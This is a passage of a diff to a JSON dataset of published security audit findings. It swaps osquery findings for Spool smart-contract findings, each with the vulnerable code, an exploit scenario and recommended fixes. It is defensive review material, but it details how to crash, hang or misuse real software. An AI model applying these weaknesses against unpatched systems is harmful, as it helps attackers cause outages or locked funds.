le to be read is not a special le. Long term, introduce a timeout on le operations so that a block does not stall the osquery thread. Also consider replacing parsePlist in favor of the parsePlistContent function and standardizing all le reads on a single code path to prevent similar issues going forward. 28 Atlassian: osquery Security Assessment 9. The parseJSON function can hang on reading certain les on Linux and macOS Severity: Medium Diculty: Low Type: Denial of Service Finding ID: TOB-ATL-9 Target: osquery/filesystem/filesystem.cpp", + "title": "30. Missing whenNotPaused modier ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The documentation species which functionalities should not be working when the system is paused, including the claiming of rewards; however, the claim function does not have the whenNotPaused modier. As a result, users can claim their rewards even when the system is paused. If the system is paused: - users cant claim vault incentives - [...] Figure 30.1: A snippet of the provided Spool documentation function claim(ClaimRequest[] calldata data) public { Figure 30.2: The claim function header in spool-v2-core/RewardPool.sol#L47 Exploit Scenario Alice, who has the ROLE_PAUSER role in the system, pauses the protocol after she sees a possible vulnerability in the claim function. The Spool team believes there are no possible funds moving from the system; however, users can still claim their rewards. Recommendations Short term, add the whenNotPaused modier to the claim function. Long term, improve the systems unit and integration tests by adding a test to verify that the expected functionalities do not work when the system is in a paused state.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "10. No limit on the amount of data read or expanded from the Safari extensions table ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The safari_extensions table allows the agent to query installed Safari extensions on a certain user prole. Said extensions consist of extensible archive format (XAR) compressed archives with the .safariextz le extension, which are stored in the ~/Library/Safari/Extensions folder. The osquery program does not have a limit on the amount of data that can be processed when reading and inating the Safari extension contents; a large amount of data may cause a denial of service. 31 Atlassian: osquery Security Assessment xar_t xar = xar_open(path.c_str(), READ); if (xar == nullptr) { TLOG << \"Cannot open extension archive: \" << path; return; } xar_iter_t iter = xar_iter_new(); xar_file_t xfile = xar_file_first(xar, iter); size_t max_files = 500; for (size_t index = 0; index < max_files; ++index) { if (xfile == nullptr) { break; } char* xfile_path = xar_get_path(xfile); if (xfile_path == nullptr) { break; } // Clean up the allocated content ASAP. std::string entry_path(xfile_path); free(xfile_path); if (entry_path.find(\"Info.plist\") != std::string::npos) { if (xar_verify(xar, xfile) != XAR_STREAM_OK) { TLOG << \"Extension info extraction failed verification: \" << path; } size_t size = 0; char* buffer = nullptr; if (xar_extract_tobuffersz(xar, xfile, &buffer, &size) != 0 || size == 0) { break; } std::string content(buffer, size); free(buffer); pt::ptree tree; if (parsePlistContent(content, tree).ok()) { for (const auto& it : kSafariExtensionKeys) { r[it.second] = tree.get(it.first, \"\"); } } break; } 32 Atlassian: osquery Security Assessment xfile = xar_file_next(iter); } Figure 10.1: genSafariExtension extracts the full Info.plist to memory. Exploit Scenario An attacker crafts a valid extension containing a large Info.plist le and stores it in ~/Library/Safari/Extensions/foo.safariextz. When the osquery agent attempts to respond to a query on the safari_extensions table, it opens the archive and expands the full Info.plist le in memory, causing high resource consumption. Recommendations Short term, enforce a limit on the amount of information that can be extracted from an XAR archive. Long term, add guidelines to the development documentation on handling untrusted input data. For instance, advise developers to limit the amount of data that may be ingested, processed, or read from untrusted sources such as user-writable les. Enforce said guidelines by performing code reviews on new contributions. 33 Atlassian: osquery Security Assessment", + "title": "31. Users who deposit and then withdraw before doHardWork lose their tokens ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Users who deposit and then withdraw assets before doHardWork is called will receive zero tokens from their withdrawal operations. When a user deposits assets, the depositAssets function mints an NFT with some metadata to the user who can later redeem it for the underlying SVT tokens. function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2) external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender) returns ( uint256 [] memory , uint256 ) { [...] // mint deposit NFT DepositMetadata memory metadata = DepositMetadata(bag.assets, block.timestamp , bag2.flushIndex); uint256 depositId = ISmartVault(bag.smartVault).mintDepositNFT(bag.receiver, metadata); [...] } Figure 31.1: A snippet of the depositAssets function in spool-v2-core/DepositManager.sol#L379L439 Users call the claimSmartVaultTokens function in the SmartVaultManager contract to claim SVT tokens. It is important to note that this function calls the _syncSmartVault function with false as the last argument, which means that it will not revert if the current ush index and the ush index to sync are the same. Then, claimSmartVaultTokens delegates the work to the corresponding function in the DepositManager contract. function claimSmartVaultTokens( address smartVault, uint256 [] calldata nftIds, uint256 [] calldata nftAmounts) public whenNotPaused returns ( uint256 ) { _onlyRegisteredSmartVault(smartVault); address [] memory tokens = _assetGroupRegistry.listAssetGroup(_smartVaultAssetGroups[smartVault]); _syncSmartVault(smartVault, _smartVaultStrategies[smartVault], tokens, false ); return _depositManager.claimSmartVaultTokens(smartVault, nftIds, nftAmounts, tokens, msg.sender ); } Figure 31.2: A snippet of the claimSmartVaultTokens function in spool-v2-core/SmartVaultManager.sol#L238L247 Later, the claimSmartVaultTokens function in DepositManager (gure 31.3) computes the SVT tokens that users will receive by calling the getClaimedVaultTokensPreview function and passing the bag.mintedSVTs value for the ush corresponding to the burned NFT. function claimSmartVaultTokens( address smartVault, uint256 [] calldata nftIds, uint256 [] calldata nftAmounts, address [] calldata tokens, address executor ) external returns ( uint256 ) { _checkRole(ROLE_SMART_VAULT_MANAGER, msg.sender ); [...] ClaimTokensLocalBag memory bag; ISmartVault vault = ISmartVault(smartVault); bag.metadata = vault.burnNFTs(executor, nftIds, nftAmounts); for ( uint256 i; i < nftIds.length; ++i) { if (nftIds[i] > MAXIMAL_DEPOSIT_ID) { revert InvalidDepositNftId(nftIds[i]); } // we can pass empty strategy array and empty DHW index array, // because vault should already be synced and mintedVaultShares values available bag.data = abi.decode(bag.metadata[i], (DepositMetadata)); bag.mintedSVTs = _flushShares[smartVault][bag.data.flushIndex].mintedVaultShares; claimedVaultTokens += getClaimedVaultTokensPreview(smartVault, bag.data, nftAmounts[i], bag.mintedSVTs , tokens); } Figure 31.3: A snippet of the claimSmartVaultTokens in spool-v2-core/DepositManager.sol#L135L184 Then, getClaimedVaultTokensPreview calculates the SVT tokens proportional to the amount deposited. function getClaimedVaultTokensPreview( address smartVaultAddress, DepositMetadata memory data, uint256 nftShares, uint256 mintedSVTs, address [] calldata tokens ) public view returns ( uint256 ) { [...] for ( uint256 i; i < data.assets.length; ++i) { depositedUsd += _priceFeedManager.assetToUsdCustomPrice(tokens[i], data.assets[i], exchangeRates[i]); totalDepositedUsd += totalDepositedAssets[i], exchangeRates[i]); _priceFeedManager.assetToUsdCustomPrice(tokens[i], } uint256 claimedVaultTokens = mintedSVTs * depositedUsd / totalDepositedUsd; return claimedVaultTokens * nftShares / NFT_MINTED_SHARES; } Figure 31.4: A snippet of the getClaimedVaultTokensPreview function in spool-v2-core/DepositManager.sol#L546L572 However, the value of _flushShares[smartVault][bag.data.flushIndex].mintedVaultShares , shown in gure 31.3, will always be 0 : the value is updated in the syncDeposit function, but because the current ush cycle is not nished yet, syncDeposit cannot be called through syncSmartVault . The same problem appears in the redeem , redeemFast , and claimWithdrawal functions. Exploit Scenario Bob deposits assets into a smart vault, but he notices that he deposited in the wrong smart vault. He calls redeem and claimWithdrawal , expecting to receive back his tokens, but he receives zero tokens. The tokens are locked in the smart contracts. Recommendations Short term, do not allow users to withdraw tokens when the corresponding ush has not yet happened. Long term, document and test the expected eects when calling functions in all of the possible orders, and add adequate constraints to avoid unexpected behavior.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: Low" ] }, { - "title": "11. Extended attributes table may read uninitialized or out-of-bounds memory ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The extended_attributes table calls the listxattr function twice: rst to query the extended attribute list size and then to actually retrieve the list of attribute names. Additionally, the return values from the function calls are not checked for errors. This leads to a race condition in the parseExtendedAttributeList osquery function, in which the content buer is left uninitialized if the target le is deleted in the time between the two listxattr calls. As a result, std::string will consume uninitialized and unbounded memory, potentially leading to out-of-bounds memory reads. std::vector attributes; ssize_t value = listxattr(path.c_str(), nullptr, (size_t)0, 0); char* content = (char*)malloc(value); if (content == nullptr) { return attributes; } ssize_t ret = listxattr(path.c_str(), content, value, 0); if (ret == 0) { free(content); return attributes; } char* stable = content; do { attributes.push_back(std::string(content)); content += attributes.back().size() + 1; } while (content - stable < value); free(stable); return attributes; Figure 11.1: parseExtendedAttributeList calls listxattr twice. 34 Atlassian: osquery Security Assessment Exploit Scenario An attacker creates and runs a program to race osquery while it is fetching extended attributes from the le system. The attacker is successful and causes the osquery agent to crash with a segmentation fault. Recommendations Short term, rewrite the aected code to check the return values for errors. Replace listxattr with flistxattr, which operates on opened le descriptors, allowing it to continue to query extended attributes even if the le is removed (unlink-ed) from the le system. Long term, establish and enforce best practices for osquery contributions by leveraging automated tooling and code reviews to prevent similar issues from reoccurring. For example, use le descriptors instead of le paths when you need to perform more than one operation on a le to ensure that the le is not deleted or replaced mid-operation. Consider using static analysis tools such as CodeQL to look for other instances of similar issues in the code and to detect new instances of the problem on new contributions. 35 Atlassian: osquery Security Assessment", + "title": "32. Lack of events emitted for state-changing functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Multiple critical operations do not emit events. As a result, it will be dicult to review the correct behavior of the contracts once they have been deployed. Events generated during contract execution aid in monitoring, baselining of behavior, and detection of suspicious activity. Without events, users and blockchain-monitoring systems cannot easily detect behavior that falls outside the baseline conditions. This may prevent malfunctioning contracts or attacks from being detected. The following operations should trigger events: SpoolAccessControl.grantSmartVaultOwnership ActionManager.setActions SmartVaultManager.registerSmartVault SmartVaultManager.removeStrategy SmartVaultManager.syncSmartVault SmartVaultManager.reallocate StrategyRegistry.registerStrategy StrategyRegistry.removeStrategy StrategyRegistry.doHardWork StrategyRegistry.setEcosystemFee StrategyRegistry.setEcosystemFeeReceiver StrategyRegistry.setTreasuryFee StrategyRegistry.setTreasuryFeeReceiver Strategy.doHardWork RewardManager.addToken RewardManager.extendRewardEmission Exploit Scenario The Spool system experiences a security incident, but the Spool team has trouble reconstructing the sequence of events causing the incident because of missing log information. Recommendations Short term, add events for all operations that may contribute to a higher level of monitoring and alerting. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "12. The readFile function can hang on reading a le ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The readFile function is used to provide a standardized way to read les. It uses the read_max variable to prevent the functions from reading excessive amounts of data. It also selects one of two modes, blocking or non-blocking, depending on the le properties. When using the blocking approach, it reads block_size-sized chunks of the le, with a minimum of 4,096 bytes, and returns the chunks to the caller. However, the call to read can block the osquery thread when reading certain les. if (handle.blocking_io) { // Reset block size to a sane minimum. block_size = (block_size < 4096) ? 4096 : block_size; ssize_t part_bytes = 0; bool overflow = false; do { std::string part(block_size, '\\0'); part_bytes = handle.fd->read(&part[0], block_size); if (part_bytes > 0) { total_bytes += static_cast(part_bytes); if (total_bytes >= read_max) { return Status::failure(\"File exceeds read limits\"); } if (file_size > 0 && total_bytes > file_size) { overflow = true; part_bytes -= (total_bytes - file_size); } predicate(part, part_bytes); } } while (part_bytes > 0 && !overflow); } else { Figure 12.1: The blocking_io ow can stall. 36 Atlassian: osquery Security Assessment Exploit Scenario An attacker creates a symlink to /dev/tty in a path known to be read by the osquery agent. When the osquery agent attempts to read the le, it stalls. Recommendations Short term, ensure that the le operations in filesystem.cpp do not block the osquery thread. Long term, introduce a timeout on le operations so that a block does not stall the osquery thread. 37 Atlassian: osquery Security Assessment", + "title": "33. Removal of a strategy could result in loss of funds ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "A Spool admin can remove a strategy from the system, which will be replaced by a ghost strategy in all smart vaults that use it; however, if a strategy is removed when the system is in specic states, funds to be deposited or withdrawn in the next do hard work cycle will be lost. If the following sequence of events occurs, the asset deposited will be lost from the removed strategy: 1. A user deposits assets into a smart vault. 2. The ush function is called. The StrategyRegistry._assetsDeposited[strategy][xxx][yyy] storage variable now has assets to send to the given strategy in the next do hard work cycle. 3. The strategy is removed. 4. doHardWork is called, but the assets for the removed strategy are locked in the master wallet because the function can be called only for valid strategies. If the following sequence of events occurs, the assets withdrawn from a removed strategy will be lost: 1. doHardWork is called. 2. The strategy is removed before a smart vault sync is done. Exploit Scenario Multiple smart vaults use strategy A. Users deposited a total of $1 million, and $300,000 should go to strategy A. Strategy A is removed due to an issue in the third-party protocol. All of the $300,000 is locked in the master wallet. Recommendations Short term, modify the associated code to properly handle deposited and withdrawn funds when strategies are removed. Long term, improve the systems unit and integration tests: consider all of the possible transaction sequences in the systems state and test them to ensure their correct behavior.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: Medium" ] }, { - "title": "13. The POSIX PlatformFile constructor may block the osquery thread ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The POSIX implementation of PlatformFiles constructor uses the open syscall to obtain a handle to the le. If the le to be opened is a FIFO, the call to open blocks the osquery thread unless the O_NONBLOCK ag is used. There are several places in the codebase in which the constructor is called without the PF_NONBLOCK ag set; all of these calls may stall on opening a FIFO. PlatformFile::PlatformFile(const fs::path& path, int mode, int perms) : fname_(path) { ... if ((mode & PF_NONBLOCK) == PF_NONBLOCK) { oflag |= O_NONBLOCK; is_nonblock_ = true; } if ((mode & PF_APPEND) == PF_APPEND) { oflag |= O_APPEND; } if (perms == -1 && may_create) { perms = 0666; } boost::system::error_code ec; if (check_existence && (!fs::exists(fname_, ec) || ec.value() != errc::success)) { handle_ = kInvalidHandle; } else { handle_ = ::open(fname_.c_str(), oflag, perms); } } Figure 13.1: The POSIX PlatformFile constructor 38 Atlassian: osquery Security Assessment ./filesystem/file_compression.cpp:26: PlatformFile inFile(in, PF_OPEN_EXISTING | PF_READ); ./filesystem/file_compression.cpp:32: PlatformFile outFile(out, PF_CREATE_ALWAYS | PF_WRITE); ./filesystem/file_compression.cpp:102: PlatformFile inFile(in, PF_OPEN_EXISTING | PF_READ); ./filesystem/file_compression.cpp:108: PlatformFile outFile(out, PF_CREATE_ALWAYS | PF_WRITE); ./filesystem/file_compression.cpp:177: PlatformFile pFile(f, PF_OPEN_EXISTING | PF_READ); ./filesystem/filesystem.cpp:242: PlatformFile fd(path, PF_OPEN_EXISTING | PF_WRITE); ./filesystem/filesystem.cpp:258: PlatformFile fd(path, PF_OPEN_EXISTING | PF_READ); ./filesystem/filesystem.cpp:531: PlatformFile fd(path, PF_OPEN_EXISTING | PF_READ); ./carver/carver.cpp:230: PlatformFile src(srcPath, PF_OPEN_EXISTING | PF_READ); Figure 13.2: Uses of PlatformFile without PF_NONBLOCK Exploit Scenario An attacker creates a FIFO le that is opened by one of the functions above, stalling the osquery agent. Recommendations Short term, investigate the uses of PlatformFile to identify possible blocks. Long term, use a static analysis tool such as CodeQL to scan the code for instances in which uses of the open syscall block the osquery thread. 39 Atlassian: osquery Security Assessment 14. No limit on the amount of data the Carver::blockwiseCopy method can write Severity: Medium Diculty: Low Type: Denial of Service Finding ID: TOB-ATL-14 Target: osquery/carver/carver.cpp", + "title": "34. ExponentialAllocationProvider reverts on strategies without risk scores ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The ExponentialAllocationProvider.calculateAllocation function can revert due to division-by-zero error when a strategys risk score has not been set by the risk provider. The risk variable in calculateAllocation represents the risk score set by the risk provider for the given strategy, represented by the index i . Ghost strategies can be passed to the function. If a ghost strategys risk score has not been set (which is likely, as there would be no reason to set one), the function will revert with a division-by-zero error. function calculateAllocation(AllocationCalculationInput calldata data) external pure returns ( uint256 [] memory ) { if (data.apys.length != data.riskScores.length) { revert ApysOrRiskScoresLengthMismatch(data.apys.length, data.riskScores.length); } [...] for ( uint8 i; i < data.apys.length; ++i) { [...] int256 risk = fromUint(data.riskScores[i]); results[i] = uint256 ( div(apy, risk) ); resultSum += results[i]; } Figure 34.1: A snippet of the calculateAllocation function in spool-v2-core/ExponentialAllocationProvider.sol#L309L340 Exploit Scenario A strategy is removed from a smart vault that uses the ExponentialAllocationProvider contract. Bob, who has the ROLE_ALLOCATOR role, calls reallocate ; however, it reverts, and the smart vault is impossible to reallocate. Recommendations Short term, modify the calculateAllocation function so that it properly handles strategies with uninitialized risk scores. Long term, improve the unit and integration tests for the allocators. Refactor the codebase so that ghost strategies are not passed to the calculateAllocator function.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: Medium" ] }, { - "title": "15. The carves table truncates large le sizes to 32 bits ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The enumerateCarves function uses rapidjson::Value::GetInt() to retrieve a size value from a JSON string. The GetInt return type is int, so it cannot represent sizes exceeding 32 bits; as a result, the size of larger les will be truncated. void enumerateCarves(QueryData& results, const std::string& new_guid) { std::vector carves; scanDatabaseKeys(kCarves, carves, kCarverDBPrefix); for (const auto& carveGuid : carves) { std::string carve; auto s = getDatabaseValue(kCarves, carveGuid, carve); if (!s.ok()) { VLOG(1) << \"Failed to retrieve carve GUID\"; continue; } JSON tree; s = tree.fromString(carve); if (!s.ok() || !tree.doc().IsObject()) { VLOG(1) << \"Failed to parse carve entries: \" << s.getMessage(); return; } Row r; if (tree.doc().HasMember(\"time\")) { r[\"time\"] = INTEGER(tree.doc()[\"time\"].GetUint64()); } if (tree.doc().HasMember(\"size\")) { r[\"size\"] = INTEGER(tree.doc()[\"size\"].GetInt()); } stringToRow(\"sha256\", r, tree); 42 Atlassian: osquery Security Assessment stringToRow(\"carve_guid\", r, tree); stringToRow(\"request_id\", r, tree); stringToRow(\"status\", r, tree); stringToRow(\"path\", r, tree); // This table can be used to request a new carve. // If this is the case then return this single result. auto new_request = (!new_guid.empty() && new_guid == r[\"carve_guid\"]); r[\"carve\"] = INTEGER((new_request) ? 1 : 0); results.push_back(r); } } } // namespace Figure 15.1: The enumerateCarves function truncates les of large sizes. Exploit Scenario An attacker creates a le on disk of a size that overows 32 bits by only a small amount, such as 0x100001336. The carves tables reports the le size incorrectly as 0x1336 bytes. The attacker bypasses checks based on the reported le size. Recommendations Short term, use GetUint64 instead of GetInt to retrieve the le size. Long term, use static analysis tools such as CodeQL to look for other instances in which a type of size int is retrieved from JSON and stored in an INTEGER eld. 43 Atlassian: osquery Security Assessment", + "title": "35. Removing a strategy makes the smart vault unusable ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Removing a strategy from a smart vault causes every subsequent deposit transaction to revert, making the smart vault unusable. The deposit function of the SmartVaultManager contract calls the depositAssets function on the DepositManager contract. The depositAssets function calls the checkDepositRatio function, which takes an argument called strategyRatios : function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2) external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender ) returns ( uint256 [] memory , uint256 ) { ... // check if assets are in correct ratio checkDepositRatio( bag.assets, SpoolUtils.getExchangeRates(bag2.tokens, _priceFeedManager), bag2.allocations, SpoolUtils.getStrategyRatiosAtLastDhw(bag2.strategies, _strategyRegistry) ); ... return (_vaultDeposits[bag.smartVault][bag2.flushIndex].toArray(bag2.tokens.length), depositId); } Figure 35.1: The depositAssets function in spool-v2-core/DepositManager.sol The value of strategyRatios is fetched from the StrategyRegistry contract, which returns an empty array on ghost strategies. This empty array is then used in a for loop in the calculateFlushFactors function: function calculateFlushFactors( uint256 [] memory exchangeRates, uint16a16 allocation, uint256 [][] memory strategyRatios ) public pure returns ( uint256 [][] memory ) { uint256 [][] memory flushFactors = new uint256 [][](strategyRatios.length); // loop over strategies for ( uint256 i; i < strategyRatios.length; ++i) { flushFactors[i] = new uint256 [](exchangeRates.length); uint256 normalization = 0; // loop over assets for ( uint256 j = 0; j < exchangeRates.length; j++) { normalization += strategyRatios[i][j] * exchangeRates[j]; } // loop over assets for ( uint256 j = 0; j < exchangeRates.length; j++) { flushFactors[i][j] = allocation.get(i) * strategyRatios[i][j] * PRECISION_MULTIPLIER / normalization; } } return flushFactors; } Figure 35.2: The calculateFlushFactors function in spool-v2-core/DepositManager.sol The statement calculating the value of normalization tries to access an index of the empty array and reverts with the Index out of bounds error, causing the deposit function to revert for every transaction thereafter. Exploit Scenario A Spool admin removes a strategy from a smart vault. Because of the presence of a ghost strategy, users deposit transactions into the smart vault revert with the Index out of bounds error. Recommendations Short term, modify the calculateFlushFactors function so that it skips ghost strategies in the loop used to calculate the value of normalization . Long term, review the entire codebase, check the eects of removing strategies from smart vaults, and ensure that all of the functionality works for smart vaults with one or more ghost strategies.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "16. The time table may not null-terminate strings correctly ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The osquery time table uses strftime to format time information, such as the time zone name, into user-friendly strings. If the amount of information to be written does not t in the provided buer, strftime returns zero and leaves the buer contents in an undened state. QueryData genTime(QueryContext& context) { Row r; time_t osquery_time = getUnixTime(); struct tm gmt; gmtime_r(&osquery_time, &gmt); struct tm now = gmt; auto osquery_timestamp = toAsciiTime(&now); char local_timezone[5] = {0}; { } struct tm local; localtime_r(&osquery_time, &local); strftime(local_timezone, sizeof(local_timezone), \"%Z\", &local); char weekday[10] = {0}; strftime(weekday, sizeof(weekday), \"%A\", &now); char timezone[5] = {0}; strftime(timezone, sizeof(timezone), \"%Z\", &now); Figure 16.1: genTime uses strftime to get the time zone name and day of the week. The strings to be written vary depending on the locale conguration, so some strings may not t in the provided buer. The code does not check the return value of strftime and assumes that the string buer is always null-terminated, which may not always be the case. 44 Atlassian: osquery Security Assessment Exploit Scenario An attacker nds a way to change the time zone on a system in which %Z shows the full time zone name. When the osquery agent attempts to respond to a query on the time table, it triggers undened behavior. Recommendations Short term, add a check to verify the return value of each strftime call made by the table implementation. If the function returns zero, ensure that the system writes a valid string in the buer before it is used as part of the table response. Long term, perform code reviews on new contributions and consider using automated code analysis tools to prevent these kinds of issues from reoccurring. 45 Atlassian: osquery Security Assessment", + "title": "36. Issues with the management of access control roles in deployment script ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The deployment script does not properly manage or assign access control roles. As a result, the protocol will not work as expected, and the protocols contracts cannot be upgraded. The deployment script has multiple issues regarding the assignment or transfer of access control roles. It fails to grant certain roles and to revoke temporary roles on deployment: Ownership of the ProxyAdmin contract is not transferred to an EOA, multisig wallet, or DAO after the system is deployed, making the smart contracts non-upgradeable. The DEFAULT_ADMIN_ROLE role is not transferred to an EOA, multisig wallet, or DAO after the system is deployed, leaving no way to manage roles after deployment. The ADMIN_ROLE_STRATEGY role is not assigned to the StrategyRegistry contract, which is required to grant the ROLE_STRATEGY role to a strategy contract. Because of this, new strategies cannot be registered. The ADMIN_ROLE_SMART_VAULT_ALLOW_REDEEM role is not assigned to the SmartVaultFactory contract, which is required to grant the ROLE_SMART_VAULT_ALLOW_REDEEM role to smartVault contracts. The ROLE_SMART_VAULT_MANAGER and ROLE_MASTER_WALLET_MANAGER roles are not assigned to the DepositManager and WithdrawalManager contracts, making them unable to move funds from the master wallet contract. We also found that the ROLE_SMART_VAULT_ADMIN role is not assigned to the smart vault owner when a new smart vault is created. This means that smart vault owners will not be able to manage their smart vaults. Exploit Scenario The Spool team deploys the smart contracts using the deployment script, but due to the issues described in this nding, the team is not able to perform the role management and upgrades when required. Recommendations Short term, modify the deployment script so that it does the following on deployment: Transfers ownership of the proxyAdmin contract to an EOA, multisig wallet, or DAO Transfers the DEFAULT_ADMIN_ROLE role to an EOA, multisig wallet, or DAO Grants the required roles to the smart contracts Allow the SmartVaultFactory contract to grant the ROLE_SMART_VAULT_ADMIN role to owners of newly created smart vaults Long term, document all of the systems roles and interactions between components that require privileged roles. Make sure that all of the components are granted their required roles following the principle of least privilege to keep the protocol secure and functioning as expected.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "17. The elf_info table can crash the osquery agent ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The elf_info table uses the libelfin library to read properties of ELF les. The library maps the entire ELF binary into virtual memory and then uses memory accesses to read the data. Specically, the load method of the mmap_loader class returns a pointer to the data for a given oset and size. To ensure that the memory access stays within the bounds of the memory-mapped le, the library checks that the result of adding the oset and the size is less than the size of the le. However, this check does not account for the possibility of overows in the addition operation. For example, an oset of 0xffffffffffffffff and a size of 1 would overow to the value 0. This makes it possible to bypass the check and to create references to memory outside of the bounds. The elf_info table indirectly uses this function when loading section headers from an ELF binary. class mmap_loader : public loader { public: void *base; size_t lim; mmap_loader(int fd) { off_t end = lseek(fd, 0, SEEK_END); if (end == (off_t)-1) throw system_error(errno, system_category(), \"finding file length\"); lim = end; base = mmap(nullptr, lim, PROT_READ, MAP_SHARED, fd, 0); if (base == MAP_FAILED) throw system_error(errno, system_category(), \"mmap'ing file\"); close(fd); } ... 46 Atlassian: osquery Security Assessment const void *load(off_t offset, size_t size) { } }; if (offset + size > lim) throw range_error(\"offset exceeds file size\"); return (const char*)base + offset; Figure 17.1: The libenfin librarys limit check does not account for overows. Exploit Scenario An attacker knows of a writable path in which osquery scans ELF binaries. He creates a malformed ELF binary, causing the pointer returned by the vulnerable function to point to an arbitrary location. He uses this to make the osquery agent crash, leak information from the process memory, or circumvent address space layout randomization (ASLR). Recommendations Short term, work with the developers of the libelfbin project to account for overows in the check. Long term, implement the recommendations in TOB-ATL-2 to minimize the impact of similar issues. 47 Atlassian: osquery Security Assessment", + "title": "37. Risk of DoS due to unbounded loops ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Guards and actions are run in unbounded loops. A smart vault creator can add too many guards and actions, potentially trapping the deposit and withdrawal functionality due to a lack of gas. The runGuards function calls all the congured guard contracts in a loop: function runGuards( address smartVaultId, RequestContext calldata context) external view { if (guardPointer[smartVaultId][context.requestType] == address (0)) { return ; } GuardDefinition[] memory guards = _readGuards(smartVaultId, context.requestType); for ( uint256 i; i < guards.length; ++i) { GuardDefinition memory guard = guards[i]; bytes memory encoded = _encodeFunctionCall(smartVaultId, guard, context); ( bool success, bytes memory data) = guard.contractAddress.staticcall(encoded); _checkResult(success, data, guard.operator, guard.expectedValue, i); } } Figure 37.1: The runGuards function in spool-v2-core/GuardManager.sol Multiple conditions can cause this loop to run out of gas: The vault creator adds too many guards. One of the guard contracts consumes a high amount of gas. A guard starts consuming a high amount of gas after a specic block or at a specic state. If user transactions reach out-of-gas errors due to these conditions, smart vaults can become unusable, and funds can become stuck in the protocol. A similar issue aects the runActions function in the AuctionManager contract. Exploit Scenario Eve creates a smart vault with an upgradeable guard contract. Later, when users have made large deposits, Eve upgrades the guard contract to consume all of the available gas to trap user deposits in the smart vault for as long as she wants. Recommendations Short term, model all of the system's variable-length loops, including the ones used by runGuards and runActions , to ensure they cannot block contract execution within expected system parameters. Long term, carefully audit operations that consume a large amount of gas, especially those in loops.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "2. Lack of two-step process for contract ownership changes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The owner of a LooksRare protocol contract can be changed by calling the transferOwnership function in OpenZeppelins Ownable contract. This function internally calls the _transferOwnership function, which immediately sets the contracts new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes. /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership () public virtual onlyOwner { _transferOwnership( address ( 0 )); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership ( address newOwner ) public virtual onlyOwner { require (newOwner != address ( 0 ), \"Ownable: new owner is the zero address\" ); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership ( address newOwner ) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } Figure 2.1: OpenZeppelins Ownable contract Exploit Scenario Alice and Bob invoke the transferOwnership() function on the LooksRare multisig wallet to change the address of an existing contracts owner. They accidentally enter the wrong address, and ownership of the contract is transferred to the incorrect address. As a result, access to the contract is permanently revoked. Recommendations Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer. Long term, identify and document all possible actions that can be taken by privileged accounts ( appendix E ) and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", + "title": "38. Unsafe casts throughout the codebase ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The codebase contains unsafe casts that could cause mathematical errors if they are reachable in certain states. Examples of possible unsafe casts are shown in gures 38.1 and 38.2. function flushSmartVault( address smartVault, uint256 flushIndex, address [] calldata strategies, uint16a16 allocation, address [] calldata tokens ) external returns (uint16a16) { [...] _flushShares[smartVault][flushIndex].flushSvtSupply = uint128(ISmartVault(smartVault).totalSupply()) ; return _strategyRegistry.addDeposits(strategies, distribution); } Figure 38.1: A possible unsafe 